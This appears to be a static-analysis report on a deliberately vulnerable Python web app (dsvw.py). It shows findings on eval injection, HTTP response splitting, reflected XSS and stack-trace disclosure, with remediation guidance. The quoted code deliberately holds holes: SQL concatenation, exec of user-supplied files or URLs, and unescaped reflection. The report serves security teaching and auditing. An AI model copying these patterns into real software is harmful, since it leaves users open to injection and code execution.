params["include"])).read(), {"DOCUMENT_ROOT": os.getcwd(), "HTTP_USER_AGENT": self.headers.get("User-Agent"), "REMOTE_ADDR": self.client_address[0], "REMOTE_PORT": self.client_address[1], "PATH": path, "QUERY_STRING": query}
                    
17
exec(program, envs)
Change this code to not dynamically execute code influenced by user-controlled data.

                    content += sys.stdout.getvalue()
                    sys.stdout = backup
                elif "redir" in params:
                    content = content.replace("<head>", "<head><meta http-equiv=\"refresh\" content=\"0; url=%s\"/>" % params["redir"])
                if HTML_PREFIX in content and HTML_POSTFIX not in content:
                    content += "<div><span>Attacks:</span></div>\n<ul>%s\n</ul>\n" % ("".join("\n<li%s>%s - <a href=\"%s\">vulnerable</a>|<a href=\"%s\">exploit</a>|<a href=\"%s\" target=\"_blank\">info</a></li>" % (" class=\"disabled\" title=\"module 'python-lxml' not installed\"" if ("lxml.etree" not in sys.modules and any(_ in case[0].upper() for _ in ("XML", "XPATH"))) else "", case[0], case[1], case[2], case[3]) for case in CASES)).replace("<a href=\"None\">vulnerable</a>|", "<b>-</b>|")
            elif path == "/users.json":
                content = "%s%s%s" % ("" if not "callback" in params else "%s(" % params["callback"], json.dumps(dict((_.findtext("username"), _.findtext("surname")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user"))), "" if not "callback" in params else ")")
            elif path == "/login":


Show 33 more lines


Change this code to not dynamically execute code influenced by user-controlled data.

Dynamic code execution should not be vulnerable to injection attacks pythonsecurity:S5334
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker
Tags
cwe
+
Line affected
L57
Effort
30 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
Resources
Articles & blog posts
SonarSource - Evil Teacher: Code Injection in Moodle
Standards
OWASP - Top 10 2021 Category A3 - Injection
OWASP - Top 10 2017 Category A1 - Injection
CWE - CWE-20 - Improper Input Validation
CWE - CWE-95 - Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
STIG Viewer - Application Security and Development: V-222609 - The application must not be subject to input handling vulnerabilities.
Code principles
Never trust user input
Applications must treat all user input and, more generally, all third-party data as attacker-controlled data.

The application must determine where the third-party data comes from and treat that data source as an attack vector. Two rules apply:

First, before using it in the application's business logic, the application must validate the attacker-controlled data against predefined formats, such as:

Character sets
Sizes
Types
Or any strict schema
Second, the application must sanitize string data before inserting it into interpreted contexts (client-side code, file paths, SQL queries). Unsanitized code can corrupt the application's logic.

Defense-in-depth
Applications and infrastructure benefit greatly from relying on multiple security mechanisms layered on top of each other. If one security mechanism fails, there is a high probability that the subsequent layers of security will successfully defend against the attack.

A non-exhaustive list of these code protection ramparts includes the following:

Minimizing the attack surface of the code
Application of the principle of least privilege
Validation and sanitization of data
Encrypting incoming, outgoing, or stored data with secure cryptography
Ensuring that internal errors cannot disrupt the overall runtime
Separation of tasks and access to information
Note that these layers must be simple enough to use in an everyday workflow. Security measures should not break usability.

________________________________________________________________________________________
FINDING_13

Change this code to not place user-controlled data in the header.

HTTP response headers should not be vulnerable to response splitting attacks pythonsecurity:S6839
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker
Tags
No tags
+
Line affected
L78
Effort
30 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
/dsvw.py


See all issues in this file


*


Show 19 more lines
    cursor.executemany("INSERT INTO users(id, username, name, surname, password) VALUES(NULL, ?, ?, ?, ?)", ((_.findtext("username"), _.findtext("name"), _.findtext("surname"), _.findtext("password")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))
    cursor.execute("CREATE TABLE comments(id INTEGER PRIMARY KEY AUTOINCREMENT, comment TEXT, time TEXT)")
class ReqHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        
5
path, 
4
query = 
1
2
3
self.path.split('?', 1) if '?' in self.path else (self.path, "")
        
12
code, content, params, cursor = http.client.OK, HTML_PREFIX, 
11
dict(
10
(match.group("parameter"), 
9
urllib.parse.unquote(
8
','.join(
7
re.findall(r"(?:\A|[?&])%s=([^&]+)" % match.group("parameter"), query)))) for match in 
6
re.finditer(r"((\A|[?&])(?P<parameter>[\w\[\]]+)=)([^&]+)", query)), connection.cursor()
        try:
            if path == '/':
                if "id" in params:
                    cursor.execute("SELECT id, username, name, surname FROM users WHERE id=" + params["id"])
                    content += "<div><span>Result(s):</span></div><table><thead><th>id</th><th>username</th><th>name</th><th>surname</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)


Show 41 more lines
            code = http.client.INTERNAL_SERVER_ERROR
        finally:
            self.send_response(code)
            self.send_header("Connection", "close")
            self.send_header("X-XSS-Protection", "0")
            
15
self.send_header("Content-Type", 
14
"%s%s" % ("text/html" if content.startswith("<!DOCTYPE html>") else "text/plain", "; charset=%s" % 
13
params.get("charset", "utf8")))
Change this code to not place user-controlled data in the header.

            self.end_headers()
            self.wfile.write(("%s%s" % (content, HTML_POSTFIX if HTML_PREFIX in content and GITHUB not in content else "")).encode())
            self.wfile.flush()
class ThreadingServer(socketserver.ThreadingMixIn, http.server.HTTPServer):
    def server_bind(self):
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        http.server.HTTPServer.server_bind(self)


Show 12 more lines

Intentionality
Not complete
Change this code to not place user-controlled data in the header.

HTTP response headers should not be vulnerable to response splitting attacks pythonsecurity:S6839
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker
Tags
No tags
+
Line affected
L78
Effort
30 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
Resources
Documentation
OWASP - HTTP Response Splitting
Standards
OWASP - Top 10 2017 Category A1 - Injection
OWASP - Top 10 2021 Category A3 - Injection
CWE - CWE-20 - Improper Input Validation
CWE - CWE-113 - Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')
STIG Viewer - Application Security and Development: V-222609 - The application must not be subject to input handling vulnerabilities.
Code principles
Never trust user input
Applications must treat all user input and, more generally, all third-party data as attacker-controlled data.

The application must determine where the third-party data comes from and treat that data source as an attack vector. Two rules apply:

First, before using it in the application's business logic, the application must validate the attacker-controlled data against predefined formats, such as:

Character sets
Sizes
Types
Or any strict schema
Second, the application must sanitize string data before inserting it into interpreted contexts (client-side code, file paths, SQL queries). Unsanitized code can corrupt the application's logic.

Defense-in-depth
Applications and infrastructure benefit greatly from relying on multiple security mechanisms layered on top of each other. If one security mechanism fails, there is a high probability that the subsequent layers of security will successfully defend against the attack.

A non-exhaustive list of these code protection ramparts includes the following:

Minimizing the attack surface of the code
Application of the principle of least privilege
Validation and sanitization of data
Encrypting incoming, outgoing, or stored data with secure cryptography
Ensuring that internal errors cannot disrupt the overall runtime
Separation of tasks and access to information
Note that these layers must be simple enough to use in an everyday workflow. Security measures should not break usability.



________________________________________________________________________________________

FINDING_14

ntentionality
Not complete
Change this code to not reflect unsanitized user-controlled data.

Endpoints should not be vulnerable to reflected cross-site scripting (XSS) attacks pythonsecurity:S5131
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker
Tags
cwe
+
Line affected
L80
Effort
30 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
/dsvw.py


See all issues in this file


*


Show 19 more lines
    cursor.executemany("INSERT INTO users(id, username, name, surname, password) VALUES(NULL, ?, ?, ?, ?)", ((_.findtext("username"), _.findtext("name"), _.findtext("surname"), _.findtext("password")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))
    cursor.execute("CREATE TABLE comments(id INTEGER PRIMARY KEY AUTOINCREMENT, comment TEXT, time TEXT)")
class ReqHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        
5
path, 
4
query = 
1
2
3
self.path.split('?', 1) if '?' in self.path else (self.path, "")
        
12
code, content, params, cursor = http.client.OK, HTML_PREFIX, 
11
dict(
10
(match.group("parameter"), 
9
urllib.parse.unquote(
8
','.join(
7
re.findall(r"(?:\A|[?&])%s=([^&]+)" % match.group("parameter"), query)))) for match in 
6
re.finditer(r"((\A|[?&])(?P<parameter>[\w\[\]]+)=)([^&]+)", query)), connection.cursor()
        try:
            if path == '/':
                if "id" in params:
                    cursor.execute("SELECT id, username, name, surname FROM users WHERE id=" + params["id"])
                    content += "<div><span>Result(s):</span></div><table><thead><th>id</th><th>username</th><th>name</th><th>surname</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)


Show 24 more lines
                    backup, sys.stdout, program, envs = sys.stdout, io.StringIO(), (open(params["include"], "rb") if not "://" in params["include"] else urllib.request.urlopen(params["include"])).read(), {"DOCUMENT_ROOT": os.getcwd(), "HTTP_USER_AGENT": self.headers.get("User-Agent"), "REMOTE_ADDR": self.client_address[0], "REMOTE_PORT": self.client_address[1], "PATH": path, "QUERY_STRING": query}
                    exec(program, envs)
                    content += sys.stdout.getvalue()
                    sys.stdout = backup
                elif "redir" in params:
                    
16
content = 
15
content.replace("<head>", 
14
"<head><meta http-equiv=\"refresh\" content=\"0; url=%s\"/>" % 
13
params["redir"])
                if HTML_PREFIX in content and HTML_POSTFIX not in content:
                    content += "<div><span>Attacks:</span></div>\n<ul>%s\n</ul>\n" % ("".join("\n<li%s>%s - <a href=\"%s\">vulnerable</a>|<a href=\"%s\">exploit</a>|<a href=\"%s\" target=\"_blank\">info</a></li>" % (" class=\"disabled\" title=\"module 'python-lxml' not installed\"" if ("lxml.etree" not in sys.modules and any(_ in case[0].upper() for _ in ("XML", "XPATH"))) else "", case[0], case[1], case[2], case[3]) for case in CASES)).replace("<a href=\"None\">vulnerable</a>|", "<b>-</b>|")
            elif path == "/users.json":
                content = "%s%s%s" % ("" if not "callback" in params else "%s(" % params["callback"], json.dumps(dict((_.findtext("username"), _.findtext("surname")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user"))), "" if not "callback" in params else ")")
            elif path == "/login":
                cursor.execute("SELECT * FROM users WHERE username='" + re.sub(r"[^\w]", "", params.get("username", "")) + "' AND password='" + params.get("password", "") + "'")
                content += "Welcome <b>%s</b><meta http-equiv=\"Set-Cookie\" content=\"SESSIONID=%s; path=/\"><meta http-equiv=\"refresh\" content=\"1; url=/\"/>" % (re.sub(r"[^\w]", "", params.get("username", "")), "".join(random.sample(string.ascii_letters + string.digits, 20))) if cursor.fetchall() else "The username and/or password is incorrect<meta http-equiv=\"Set-Cookie\" content=\"SESSIONID=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT\">"
            else:
                code = http.client.NOT_FOUND
        except Exception as ex:
            content = ex.output if isinstance(ex, subprocess.CalledProcessError) else traceback.format_exc()
            code = http.client.INTERNAL_SERVER_ERROR
        finally:
            self.send_response(code)
            self.send_header("Connection", "close")
            self.send_header("X-XSS-Protection", "0")
            self.send_header("Content-Type", "%s%s" % ("text/html" if content.startswith("<!DOCTYPE html>") else "text/plain", "; charset=%s" % params.get("charset", "utf8")))
            self.end_headers()
            
20
self.wfile.write(
19
(
18
"%s%s" % (
17
content, HTML_POSTFIX if HTML_PREFIX in content and GITHUB not in content else "")).encode())
Change this code to not reflect unsanitized user-controlled data.

            self.wfile.flush()
class ThreadingServer(socketserver.ThreadingMixIn, http.server.HTTPServer):
    def server_bind(self):
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        http.server.HTTPServer.server_bind(self)
if __name__ == "__main__":
    init()


Show 10 more linesIntentionality
Not complete
Change this code to not reflect unsanitized user-controlled data.

Endpoints should not be vulnerable to reflected cross-site scripting (XSS) attacks pythonsecurity:S5131
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker
Tags
cwe
+
Line affected
L80
Effort
30 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
Resources
Documentation
OWASP - XSS Prevention Cheat Sheet
Django Project, Request and response objects (Django 4.0)
Django, Built-in template tags and filters
Flask, Security Considerations
The Pallets Projects, Jinja, Template Designer Documentation
Articles & blog posts
SonarSource - WordPress 5.8.2 Stored XSS Vulnerability
SonarSource - Ghost CMS 4.3.2 - Cross-Origin Admin Takeover
Samy Kamkar - The MySpace Worm
James Kettle, PortSwigger - Web Storage: The Lesser Evil for Session Tokens
Conference presentations
DEF CON Safe Mode Red Team Village, Ray Doyle, Weaponized XSS Moving Beyond Alert
Standards
OWASP - Top 10 2021 Category A3 - Injection
OWASP - Top 10 2017 Category A7 - Cross-Site Scripting (XSS)
CWE - CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
STIG Viewer - Application Security and Development: V-222602 - The application must protect from Cross-Site Scripting (XSS) vulnerabilities.
STIG Viewer - Application Security and Development: V-222609 - The application must not be subject to input handling vulnerabilities.
Code principles
Never trust user input
Applications must treat all user input and, more generally, all third-party data as attacker-controlled data.

The application must determine where the third-party data comes from and treat that data source as an attack vector. Two rules apply:

First, before using it in the application's business logic, the application must validate the attacker-controlled data against predefined formats, such as:

Character sets
Sizes
Types
Or any strict schema
Second, the application must sanitize string data before inserting it into interpreted contexts (client-side code, file paths, SQL queries). Unsanitized code can corrupt the application's logic.

Defense-in-depth
Applications and infrastructure benefit greatly from relying on multiple security mechanisms layered on top of each other. If one security mechanism fails, there is a high probability that the subsequent layers of security will successfully defend against the attack.

A non-exhaustive list of these code protection ramparts includes the following:

Minimizing the attack surface of the code
Application of the principle of least privilege
Validation and sanitization of data
Encrypting incoming, outgoing, or stored data with secure cryptography
Ensuring that internal errors cannot disrupt the overall runtime
Separation of tasks and access to information
Note that these layers must be simple enough to use in an everyday workflow. Security measures should not break usability.




________________________________________________________________________________________

FINDING_15

Change this code to not disclose the stack traces.

Stack traces should not be disclosed pythonsecurity:S6776
Software qualities impacted:
Security


3
Low
Open
Not assigned
Vulnerability
Minor
Tags
No tags
+
Line affected
L80
Effort
30 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
/dsvw.py


See all issues in this file


*


Show 66 more lines
                cursor.execute("SELECT * FROM users WHERE username='" + re.sub(r"[^\w]", "", params.get("username", "")) + "' AND password='" + params.get("password", "") + "'")
                content += "Welcome <b>%s</b><meta http-equiv=\"Set-Cookie\" content=\"SESSIONID=%s; path=/\"><meta http-equiv=\"refresh\" content=\"1; url=/\"/>" % (re.sub(r"[^\w]", "", params.get("username", "")), "".join(random.sample(string.ascii_letters + string.digits, 20))) if cursor.fetchall() else "The username and/or password is incorrect<meta http-equiv=\"Set-Cookie\" content=\"SESSIONID=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT\">"
            else:
                code = http.client.NOT_FOUND
        except Exception as ex:
            
2
content = ex.output if isinstance(ex, subprocess.CalledProcessError) else 
1
traceback.format_exc()
            code = http.client.INTERNAL_SERVER_ERROR
        finally:
            self.send_response(code)
            self.send_header("Connection", "close")
            self.send_header("X-XSS-Protection", "0")
            self.send_header("Content-Type", "%s%s" % ("text/html" if content.startswith("<!DOCTYPE html>") else "text/plain", "; charset=%s" % params.get("charset", "utf8")))
            self.end_headers()
            
6
self.wfile.write(
5
(
4
"%s%s" % (
3
content, HTML_POSTFIX if HTML_PREFIX in content and GITHUB not in content else "")).encode())
Change this code to not disclose the stack traces.

            self.wfile.flush()
class ThreadingServer(socketserver.ThreadingMixIn, http.server.HTTPServer):
    def server_bind(self):
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        http.server.HTTPServer.server_bind(self)
if __name__ == "__main__":
    init()


Show 10 more lines

Intentionality
Not complete
Change this code to not disclose the stack traces.

Stack traces should not be disclosed pythonsecurity:S6776
Software qualities impacted:
Security


3
Low
Open
Not assigned
Vulnerability
Minor
Tags
No tags
+
Line affected
L80
Effort
30 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
Resources
Documentation
Python Documentation - traceback — Print or retrieve a stack traceback

Standards
OWASP - Top 10 2021 Category A4 - Insecure Design
OWASP - Top 10 2017 Category A3 - Sensitive Data Exposure
CWE - CWE-209 - Generation of Error Message Containing Sensitive Information
CWE - CWE-489 - Active Debug Code
STIG Viewer - Application Security and Development: V-222610 - The application must generate error messages that provide information necessary for corrective actions without revealing information that could be exploited by adversaries.